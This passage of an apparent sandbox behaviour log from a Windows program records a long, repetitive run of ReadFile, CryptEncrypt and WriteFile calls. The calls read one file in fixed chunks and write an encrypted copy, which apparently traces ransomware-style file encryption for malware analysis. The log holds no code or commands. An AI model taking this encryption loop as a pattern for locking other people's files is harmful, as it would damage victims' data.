pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.952] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.953] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.953] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.953] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.953] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.953] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.954] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.954] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.954] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.954] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.954] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.955] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.955] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.956] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.956] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, 